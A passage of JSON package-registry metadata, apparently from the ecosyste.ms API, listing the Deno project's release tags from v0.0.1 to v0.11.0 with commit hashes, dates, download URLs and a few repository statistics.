07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:46:28.004Z","dependent_packages_count":0,"downloads":44312,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":93.5848213721284,"dependent_repos_count":17.319930880431574,"dependent_packages_